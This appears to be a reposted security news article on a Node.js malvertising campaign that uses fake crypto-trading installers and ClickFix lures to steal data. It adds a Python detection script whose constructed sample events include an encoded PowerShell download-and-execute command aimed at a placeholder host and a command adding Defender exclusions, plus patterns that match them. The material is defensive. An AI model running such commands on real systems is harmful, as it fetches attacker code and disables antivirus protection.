Microsoft has disclosed a malvertising campaign, active since at least October 2024, that uses Node.js to run malicious payloads aimed at stealing sensitive data. The campaign targets unsuspecting users with cryptocurrency-themed lures and fraudulent websites that impersonate legitimate trading platforms such as Binance and TradingView. As the attack progresses, the threat actors rely on obfuscated PowerShell commands and persistence mechanisms to gather system information and exfiltrate valuable data. Here is an in-depth look at this ongoing threat, its techniques, and how it unfolds.
The campaign relies on fraudulent cryptocurrency trading platforms to attract potential victims. Once a user visits one of these fake sites, they are tricked into downloading a rogue installer that masquerades as legitimate software. The installer contains a Dynamic-Link Library (DLL) named “CustomActions.dll,” which carries out the first malicious actions on the infected system. It begins by collecting basic system information through Windows Management Instrumentation (WMI), giving the attackers an initial profile of the target environment. The DLL then establishes persistence by creating a scheduled task, so that the next stage is launched again on a schedule and the attackers keep their foothold even if the victim restarts the device.
To keep the victim from noticing anything, the DLL launches a browser window through “msedge_proxy.exe” that displays the genuine cryptocurrency trading website. The user sees the site they expected while the payload continues to operate in the background.
Behind the scenes, the scheduled task runs PowerShell commands that download additional malicious scripts from a remote server. These scripts attempt to evade Microsoft Defender for Endpoint by adding exclusions for the running PowerShell process and for the current directory, so that the files dropped there are not scanned. A practitioner should note that an exclusion change is itself a high-signal event: Defender records configuration changes, and exclusions added from a PowerShell process running out of a temporary directory are rarely legitimate. Once the exclusions are in place, obfuscated PowerShell commands retrieve further scripts that harvest detailed system data, including the operating system, BIOS, hardware, and installed applications.
The collected data is serialized to JSON and sent to a command-and-control (C2) server in HTTPS POST requests. The attackers then move to the next phase: they download an archive from the C2 containing a Node.js runtime binary and a JavaScript compiled (JSC) file, a precompiled form that is harder to inspect than plain source. The Node.js binary is executed to run the JSC file, which establishes network connections and attempts to extract sensitive browser data.
In another observed variation, the “ClickFix” social engineering technique is used: the victim is tricked into running a PowerShell command that launches Node.js with the JavaScript supplied inline, so no script file is written to disk for conventional file-based scanning to catch. That inline JavaScript performs network discovery and collects additional intelligence. The attackers disguise their C2 traffic as legitimate Cloudflare activity to evade detection, and make system modifications for persistence, such as altering Windows Registry keys.
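The stages described above (a scheduled task that launches PowerShell, Defender exclusions added from PowerShell, Node.js dropped into a user-writable directory and run against a .jsc file or with inline JavaScript) each leave a process-creation or configuration-change record that can be hunted for. The following is an added example, not code from Microsoft or from the article, of simple triage logic over such records. The event shape (fields named after Sysmon process-creation events and the Defender configuration-change event) and every sample record are constructed for illustration; the rule names, the hostnames and the paths are assumptions, not indicators taken from the campaign.

```python
"""Added example: triage constructed process/config events for the stages described above.

Records are modelled on Sysmon Event ID 1 (process creation) and Microsoft Defender
event 5007 (configuration change), but all samples below are constructed, not telemetry
from the campaign.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int
    image: str = ""          # full path of the created process
    parent_image: str = ""   # full path of its parent
    command_line: str = ""
    message: str = ""        # free-text body of a Defender 5007 event


# PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps_command(cmd: str) -> str:
    """Build an -EncodedCommand argument (used here only to construct samples)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so obfuscated commands can be inspected."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not really base64/UTF-16LE; keep the raw line


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: Event) -> list[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    hits = []
    cl = decode_encoded_command(ev.command_line).lower()  # decode before lowering: base64 is case-sensitive
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    user_writable = any(s in ev.image.lower() for s in ("\\temp\\", "\\appdata\\"))

    # Persistence: a scheduled task whose action is a PowerShell command.
    if img == "schtasks.exe" and "/create" in cl and "powershell" in cl:
        hits.append("scheduled-task-persistence-launching-powershell")
    # Stage download: a PowerShell download-and-execute cradle.
    if "powershell" in cl and any(k in cl for k in ("iwr ", "invoke-webrequest", "downloadstring", "iex ")):
        hits.append("powershell-download-cradle")
    # Defense evasion: exclusions added from PowerShell.
    if "add-mppreference" in cl and ("-exclusionpath" in cl or "-exclusionprocess" in cl):
        hits.append("defender-exclusion-added-via-powershell")
    if ev.event_id == 5007 and "\\exclusions\\" in ev.message.lower():
        hits.append("defender-exclusion-changed")
    # Execution: dropped Node.js running compiled or inline JavaScript.
    if img == "node.exe":
        if re.search(r"\.jsc\b", cl):
            hits.append("node-executing-compiled-jsc")
        if re.search(r"\s-e\s", cl) or "--eval" in cl:
            hits.append("node-inline-javascript")
        if parent in ("powershell.exe", "pwsh.exe", "cmd.exe") and user_writable:
            hits.append("node-spawned-by-shell-from-user-writable-path")
    return hits


def hunt(events: list[Event]) -> list[tuple[int, list[str]]]:
    """Index and rule names of every event that matched at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]


# Constructed sample records (hostnames, paths and task name are made up).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_TMP = r"C:\Users\victim\AppData\Local\Temp"
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\System32\schtasks.exe", parent_image=_TMP + r"\TradingView-Setup.exe",
          command_line='schtasks.exe /create /sc minute /mo 30 /tn "EdgeUpdateTask" /tr "powershell.exe -w hidden -enc '
                       + encode_ps_command("iex (iwr https://example.invalid/stage2.ps1)") + '"'),
    Event(1, image=_PS, parent_image=r"C:\Windows\System32\svchost.exe",
          command_line="powershell.exe -w hidden -enc "
                       + encode_ps_command("Add-MpPreference -ExclusionProcess $PID -ExclusionPath (Get-Location).Path")),
    Event(5007, message=r"Microsoft Defender Antivirus Configuration has changed. New value: "
                        r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\victim\AppData\Local\Temp = 0x0"),
    Event(1, image=_TMP + r"\node.exe", parent_image=_PS, command_line=r"node.exe " + _TMP + r"\main.jsc"),
    Event(1, image=_TMP + r"\node.exe", parent_image=_PS,
          command_line="node.exe -e \"require('dns').resolve('example.invalid')\""),
    Event(1, image=r"C:\Program Files\nodejs\node.exe", parent_image=r"C:\Program Files\Code\Code.exe",
          command_line=r"node.exe C:\dev\app\server.js"),  # benign developer usage: should not match
]

if __name__ == "__main__":
    for index, rules in hunt(SAMPLE_EVENTS):
        print(index, rules)
```

Decoding `-EncodedCommand` before matching is the part that matters most: the exclusion command in the second sample is invisible to a plain substring search on the raw command line. The last sample, a developer's Node.js under Program Files launched from an editor, matches nothing, which is the false-positive case any such rule set has to get right.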
Microsoft highlights the dual-use nature of Node.js in this attack. Node.js is a widely used open-source runtime for building legitimate applications, and that same ubiquity makes it attractive to attackers who want their activity to blend in with legitimate software. A signed, well-known runtime executing attacker-supplied code draws less scrutiny from traditional controls, which helps the operators maintain long-term access to compromised systems and extract data without raising suspicion.
This attack is not an isolated incident. CloudSEK recently reported that a fake PDF-to-DOCX converter site impersonating PDF Candy was also using the ClickFix technique to deploy a different malware family, SectopRAT, which is known for stealing sensitive data. Phishing campaigns against company employees have also been observed, using human resources-themed scams to gain unauthorized access to payroll systems and divert funds.
What Undercode Says:
This ongoing malvertising campaign, built around the Node.js runtime, is a sophisticated and evolving threat. Node.js has long been an essential tool for developers building efficient and scalable applications. Unfortunately, as with many popular technologies, its widespread use also makes it an attractive vector for malicious actors.
That threat actors are blending malicious activity with legitimate software components like Node.js highlights a growing challenge for defenders. Traditional security tools, effective against known threats, are less adept at detecting attacks that use trusted software environments to mask their activity. This is especially concerning when combined with obfuscated PowerShell commands, which are routinely used to sidestep endpoint detection.
The campaign also shows the creativity and persistence of modern attackers. By impersonating cryptocurrency trading platforms, the attackers target people who already trade online, which raises the odds that a victim downloads the fake installer. Disguising C2 traffic as Cloudflare activity is likewise a reminder that advanced threat actors hide behind established, trusted services to avoid detection.
The persistence mechanisms, scheduled tasks and registry modifications, point to a well-organized effort to keep control of compromised systems for as long as possible. This level of sophistication requires a response from both users and security teams. Individuals can protect themselves by being cautious about installing software from unfamiliar sources; organizations must monitor their endpoints and networks for the signs of compromise described above and keep their security tooling updated to detect and block these threats.
Also troubling is the reported trend of phishing campaigns using similar tactics. These attacks target not just individuals but companies, with a specific focus on payroll systems. Hijacking payroll portals to steal financial data can have devastating consequences for employees and employers alike. The attackers' use of sponsored search ads to drive traffic to malicious websites, particularly for HR-related scams, shows how they exploit both trust and advertising platforms to their advantage.
Given the increasing complexity of these attacks, defense needs to be proactive, adaptive, and layered. Users must remain vigilant, and organizations need detection methods that identify threats early. Execution of runtimes like Node.js from unusual locations should be monitored, since abuse of a trusted runtime is not immediately apparent to traditional security measures.
Fact Checker Results:
- Node.js Abuse: The use of Node.js in malware campaigns is a confirmed tactic. Note that this is abuse of a legitimate, trusted runtime to execute attacker-supplied code, not a vulnerability in Node.js itself.
- ClickFix and Inline JavaScript: The ClickFix technique, and the use of inline JavaScript to avoid writing a script file to disk, have been verified as methods used by attackers in multiple campaigns.
- Phishing Attacks and Payroll Scams: The reported phishing scams targeting payroll systems and their connection to groups such as “Payroll Pirates” have been substantiated through multiple security reports.
References:
Reported By: thehackernews.com